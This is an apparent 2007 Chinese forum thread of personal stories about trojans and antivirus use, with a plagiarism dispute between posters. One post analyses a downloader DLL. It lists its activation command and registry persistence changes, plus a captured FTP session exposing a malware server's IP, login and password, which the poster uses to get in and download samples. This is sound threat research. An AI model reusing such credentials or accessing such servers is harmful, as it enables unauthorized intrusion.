新旧没有限制，但原创新文会更受青睐的。而且旧文还需要承担一个证明的义务，你需要证明网上搜到的那些同样文章确实是你写的。

引用:

原帖由 夜知 于 Thu, 12 Jul 2007 02:50:42 +0000o4[12am31efo 02:50 发表
新旧没有限制，但原创新文会更受青睐的。而且旧文还需要承担一个证明的义务，你需要证明网上搜到的那些同样文章确实是你写的。

：）谢谢。

网上的文章都加了天极logo的，我贴的则是纯净的图片。（原图BMP，仅转为JPG）
另外，还好，天极转载时保留了我的ID。：）

其他的证明，如果有需要可以再提供。

有时间再考虑弄个新文，嘿嘿

我同木马的相识还要追溯到“千年虫”时期，那时我刚刚购买一台电脑不久，只懂得简单电脑操作的我对电脑防护根本就是一窍不通，所以电脑接网后很快就被网络病毒和木马入侵。万般无奈的我想起一款使用者众多的杀毒软件，便请求电脑高手帮我在机器上安装此款软件。杀毒软件在电脑中开启后，迅速报告病毒的存在并要求查杀，我一不做二不休直接让杀毒软件迅速扫描整个硬盘开始查杀。这一扫描的结果是我的电脑感染成百个病毒，简直就是病入膏肓，惊得我瞠目结舌半天没有反应。不过，恢复平静的我还是让杀毒软件将整个电脑中的病毒都清除了。
病毒的清除使我一时间倍感轻松，高兴之余打开IE浏览器准备上网转悠一会儿，就是这种得意忘形的举动，让我登陆网页时发现网页开始自动打开N个页面，且弹出的速度极快，让我只有招架之功难有还手之力。我只好用鼠标把一个一个打开的窗口关闭，但我关闭一个它就开启一个，如此循环往复不停的弹出和关闭让我最终败下阵来，握着疼痛的手指，眼睁睁的看着机器开始陷入瘫痪状态，犹如死机一样无法操作，无助的我开始求助于网络高手，他听完我“声嘶力竭”的事件描述，便推荐一款名为“EWIDO ANTI-SPYWARE”的防木马软件让我安装后清除电脑中的木马。从新启动电脑后，我半信半疑的从QQ上接收上接收了软件的安装包，将软件安装成功。木马防护软件开始启动，首先弹出一对话框，显示出“危险级别很高，红色，请求清除并隔离”这样一段话和几个选项，我顾不得许多，点击“清除并隔离”选项，将查出的木马清除掉。随着清除动作，对话框也消失了，我怀着忐忑不安的心情开启了IE浏览器，打开了一个IE窗口，但并没有“蹦”出其它一些窗口。我差点高兴的跳起来，困扰我的网页问题终于消失了，我的生活也因木马的清除而恢复了正常。
正因为这次接网的教训，使我以后安装系统接网时，首先把杀毒软件的防火墙开启，特别是我现在使用金山毒霸后电脑的防护效果变得更好了。当然，这也得易于当年我与木马的那一次亲密接触。

引用:

原帖由 winr 于 2007-7-12 17:38 发表


：）谢谢。

网上的文章都加了天极logo的，我贴的则是纯净的图片。（原图BMP，仅转为JPG）
另外，还好，天极转载时保留了我的ID。：）

其他的证明，如果有需要可以再提供。

有时间再考虑 ...

10楼文章出自http://study.feloo.com/computer/soft/anquan/200601/129761.html 并非原创

99年就开始接触电脑，虽然不是学电脑的，但8、9年的经验心得，加之单位数十台电脑不断遇到的各种问题，使我逐渐成为懂得使用电脑。也是经验不断积累的过程。当然，其中的苦乐也是回味无穷。

就说说前阵子遇到的病毒“AV终结者”。

一天电脑用的好好的，突然所有的杀毒软件都没有了。晕了，怎么会这样呢？前面也遇到过木马病毒，先后也买了金山毒霸正版杀入软件，用最新买的杀毒优盘也无法清除。折腾了大半天，一点办法也没有，进安全模式杀毒不行， dos 杀毒也不行，……

最后就差重装系统了，下午5点多，最后灵机一动，想到了杀毒软件公司求助热线，瑞星电话通了，哎，没人接。金山毒霸的客服告知，中了最新的木马病毒，如何下专杀后，一会便解决了。大功告成。。。

少走了不少弯路，呵呵 。。。

今天得到了那个猥琐的未知病毒（流氓）cdnprh.dll，于是测试了一下，像不到有大大的收获，端到一个大毒窝了！得到了20个卡巴未知样本！



＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

cdnprh.dll样本信息：


Antivirus Version Update Result
AhnLab-V3 2007.6.12.2 06.13.2007  no virus found
AntiVir 7.4.0.32 06.13.2007  no virus found
Authentium 4.93.8 06.12.2007 Possibly a new variant of W32/Downloader-Sml-based!Maximus
Avast 4.7.997.0 06.13.2007  no virus found
AVG 7.5.0.467 06.13.2007  no virus found
BitDefender 7.2 06.13.2007 Generic.Malware.dld!!.B3FEFEC5
CAT-QuickHeal 9.00 06.13.2007  no virus found
ClamAV devel-20070416 06.13.2007  no virus found
DrWeb 4.33 06.13.2007 DLOADER.Trojan
eSafe 7.0.15.0 06.12.2007  no virus found
eTrust-Vet 30.7.3715 06.13.2007  no virus found
Ewido 4.0 06.13.2007  no virus found
FileAdvisor 1 06.13.2007  no virus found
Fortinet 2.85.0.0 06.13.2007  no virus found
F-Prot 4.3.2.48 06.12.2007 W32/Downloader-Sml-based!Maximus
F-Secure 6.70.13030.0 06.13.2007  no virus found
Ikarus T3.1.1.8 06.13.2007  no virus found
Kaspersky 4.0.2.24 06.13.2007  no virus found
McAfee 5051 06.12.2007  no virus found
Microsoft 1.2503 06.13.2007  no virus found
NOD32v2 2327 06.13.2007  no virus found
Norman 5.80.02 06.13.2007  no virus found
Panda 9.0.0.4 06.13.2007 Suspicious file
Prevx1 V2 06.13.2007  no virus found
Sophos 4.18.0 06.12.2007  no virus found
Sunbelt 2.2.907.0 06.09.2007  no virus found
Symantec 10 06.13.2007  no virus found
TheHacker 6.1.6.132 06.11.2007  no virus found
VBA32 3.12.0.1 06.12.2007  no virus found
VirusBuster 4.3.23:9 06.13.2007  no virus found
Webwasher-Gateway 6.0.1 06.13.2007  no virus found


Aditional Information
File size: 5632 bytes
MD5: 574a929ac0e76af7fd85f812fe5d6480
SHA1: 415fcd88cb9c01f647c39b7d5cd02353632689bf



＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝



运行"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start激活病毒后：

注册表改动：

添加：
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hqghumeay         Type: REG_SZ, Length: 148, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start         Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start         Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions"         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile         Type: REG_DWORD, Length: 4, Data: 0

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

网络动作：

从网上下载一个exe文件到C:\windows\temp\nlfdxfirc.exe并运行之；

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

nlfdxfirc.exe激活后：

文件改动：

创建：

%Temp%\tmp93.CAB
%Temp%\tmp94.CAB
C:\WINDOWS\system32\kuyths00.dll
C:\WINDOWS\system32\drivers\kuyths00.sys

删除：

%Temp%\tmp93.CAB
%Temp%\tmp94.CAB

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

注册表改动：

添加：

HKLM\SYSTEM\ControlSet001\Services\kuyths00         Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Type         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Start         Type: REG_DWORD, Length: 4, Data: 3
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ErrorControl         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ImagePath         Type: REG_EXPAND_SZ, Length: 90, Data: \??\C:\WINDOWS\system32\drivers\kuyths00.sys
HKLM\SYSTEM\ControlSet001\Services\kuyths00\DisplayName         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security         Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security\Security         Type: REG_BINARY, Length: 168, Data: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\NextInstance         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control\*NewlyCreated*         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Service         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Legacy         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ConfigFlags         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Class         Type: REG_SZ, Length: 26, Data: LegacyDriver
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ClassGUID         Type: REG_SZ, Length: 78, Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\DeviceDesc         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\0         Type: REG_SZ, Length: 52, Data: Root\LEGACY_KUYTHS00\0000
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\Count         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\NextInstance         Type: REG_DWORD, Length: 4, Data: 1

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

其他：

这时调用cdnprh.dll的rundll32.exe写入了一个注册表信息，也就是昨天的那个乱码情形了：

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\neojdsacml         Type: REG_SZ, Length: 148, Data: #D;]XJOEPXT]tztufn43]Svoemm43/fyf#!#D;]XJOEPXT]tztufn43]deoqsi/emm#-Tubsu

这个东西即使使用icesword查看也是乱码，估计加载时是靠那个驱动翻译为正常的信息；

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

追寻它下载的那个exe文件的地址：

在查看抓的数据包时，没有直接看到exe文件的地址，但发现了下面的几个数据包：

220 Welcome to blah FTP service.
USER netserv3
韝?箹
331 Please specify the password.
PASS 43243wen9874
230 Login successful.
TYPE I
200 Switching to Binary mode.
PASV
200 Switching to Binary mode.

PASV
PASV
227 Entering Passive Mode (60,18,146,34,150,163)
?
?
SIZE /plug/179.exe
SIZE /plug/179.exe
213 19776
RETR /plug/179.exe
150 Opening BINARY mode data connection for /plug/179.exe (19776 bytes).

一个FTP站点，而且需要账号和密码，根据数据包信息，打开小车的站点资源探测器，地址为ftp://60.18.146.**/，登陆的用户为netserv3，口令为43243wen9874；

回车，成功登陆上去了！里面有不少文件，打开了plug目录，发现了20个大小相近的exe文件，全部下载下来一看，所有的CRC32校验码都是不同的！又打开了plugback目录，再次发现了20个大小几乎一样的exe文件！据测试是和plug目录里面的一样的；

另外还有一些其他文件，迟些在慢慢研究；

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

随便测试了几个，他们的动作和那个nlfdxfirc.exe如出一辙！用卡巴扫描了一下，一个也不报！看来是高手所为了！我想这个东西可能在未来几天内流行起来！希望各位有所警惕！

引用:

原帖由 wj7216 于 Wed, 25 Jul 2007 12:37:15 +0000o3[25pm31efo 12:37 发表
10楼文章出自http://study.feloo.com/computer/soft/anquan/200601/129761.html 并非原创

前面就说明了啊，原发于CTIPS。后来被不少网站转载。
你那个网站也是转载自ZOL的吧。

能够拿到那篇文章不加LOGO的图片，只有作者、杂志社和部分网站编辑吧。

如有异议，可以联系相关编辑证实。

我就是原创作者，我没有兴趣冒认别人的文章来充数，呵呵。而且这篇文章随便一搜，到处都是。

杂志应该还在，如果需要，可以扫描上传。：）

我现在初二了(快升初三了），还在用毒霸。我用毒霸2年多（玩电脑才三年），一开始是别人给我装的瑞星，后来我觉得不好用（中了毒），就上网问了一下，还以为只有一种杀软的呢？没想道还有那么多。我看着看着，看到有瑞星、卡巴等，当我看到金山毒霸2005的时候我觉得这个好，用一下才知道，好看！我就一直玩（乱点）！那时我还不知道杀毒软件要升级的，中毒后很卡，我就用毒霸杀毒（还没买号的），我说怎么杀不了毒的呢（那时太傻了）？后来叫人帮我修好了我就傻傻的问了一句， “杀毒软件是什么？”那个人当场就晕-_- 这时他就教我升级，他说你有没序列号？ “我就说什么是序列号？”那人又 我就 杀毒软件也要钱？！ 我就想办法向妈妈要钱买序列号。 想到办法后（直说）老妈居然答应了（那是经济非常不好） 我还是去买了用着，一直到现在。
我用了金山毒霸后的建意：
1、有点占内存（我的机子卡）；
2、价格有点高，让人望而却步（穷啊）；
3、没用开机杀毒。

我现在没有很多的时间，所以，我以后有时间会补上去。谢谢

　　我与木马的亲密接触

　　裸奔，相信对程序理解，从不用杀毒软件
　　我是一名有着3 年经验的老程序员，平时可以说就是和电脑打交道，从软件到硬件
，从PC机到服务器，都有涉及，凭着我对程序的理解我从来都是不用杀毒软件的。也是
我运气好，直到那之前我一直都没有中招，直到那天，中了一个木马，最终吃尽了苦头
！
　　裸奔小心得
　　差开一句，如果有人和我以前一样也喜欢发挥机器最大性能，愿意裸奔的话（毕竟
对我们开发人员来说提升那么一点点性能都是好的，杀毒软件对性能影响是有的），那
我附送我的四点小心得，但其实切忌因小失大啊！
　　发现机器异常立即拔掉网线然后检查以下四点：

引用:

1 、按日期查看windows 目录、 system32目录、 program目录、盘符根目录，并用假

文件只读替代！

2 、系统服务

3 、查注册表的开机器项

4 、del 内存内的异常进程

　　

裸奔终中招，以为杀得了，第一次中毒出现
　　那天终于到来，是在熊猫烧香的末期，我十分留意门户网站的计算机板块，所以在
烧香出现初期，就十分小心，少下载少装不必要的软件，也一直相安无事。
　　也许是熊猫烧香的末期，放松了警惕，在xunlei的一个软件blog内中招了，是一个
威金的变种木马，于是在windows 目录、 system32 目录、盘符根目录都出现了病毒载
体（并且还在不停网上更新，这是我在最后中招才总结出来的），我按照自己的心得不
紧不慢的拔掉网线，开是查杀，进安全看注册表，安日期查新文件，我删、删、删……
忙了2 小时终于都正常了，开机也很好，于是我查上网线，上IE，也没问题。但是接下
来就是地狱了！
　　无可奈何，却不回头，第二次中毒出现
　　在我运行开发软件时，机器出现过网卡不停闪烁，但我没有留意，之后1 小时很正
常，但突然机器有出现中毒症状，还比刚才严重，比如硬盘闪个不停，网卡不停传输等
等，我有重复之前步骤杀毒，但已经没有效果，只要一上网，就异常缓慢，无奈我去毒
霸网上智能在线查杀去试试运气，没想到，真的可以杀，原来这个威金把所有的EXE 后
缀的文件全部加shell 和它的病毒下载端绑定了，只要运行任何exe 文件，他就会上网
下载病毒！
　　最终回，服务器服务端被染，终下苦果
　　终于经过一天的艰苦杀毒，终于把木马干掉，看着杀毒报告上显示的1w多个exe 的
清除木马报告，我是终于松了口气，但殊不知，还有一个被我忽略的地方，也是这个变
种最可误之处！
　　第二天我们去客户出部署服务器服务端，回来后，到了下午就有客户反映网站异常
，我们立马赶去解决，但非常奇怪的打开其中一个子栏目就会跳到1717XX这个黄色网站
这令客户非常光火，也令我们公司颜面尽失，保证当天解决，我们把网站这个模块停运
，不停查啊查，但仍无结果，最后到了晚上9 点多实在没法子了一行行看代码，终于发
现其中一个JSP 页面代码被病毒改写了，那是在我第一次和第二次中毒期间开发完提交
项目的一个文件，也就是说由于我本人的失误，在杀毒软件查杀了机器前，向项目服务
器提交了感染文件在查杀后没有意识到本机是无毒了，但项目服务器其实被感染了，终
酿大错！给公司和客户造成了严重不良影响！
　　经过这次事件，我意识到在如今会升级会进化的木马面前，裸奔实在是不适
合时代，为了自身和周围的安全负责，确实需要安装防毒软件啊！以上就是我和
木马的一点点接触，但就是那么短短的一次造成了巨大代价，实在得不偿失啊！

以上版权属于it168 不得转载

[ 本帖最后由 lufa2007 于 2007-7-31 20:32 编辑 ]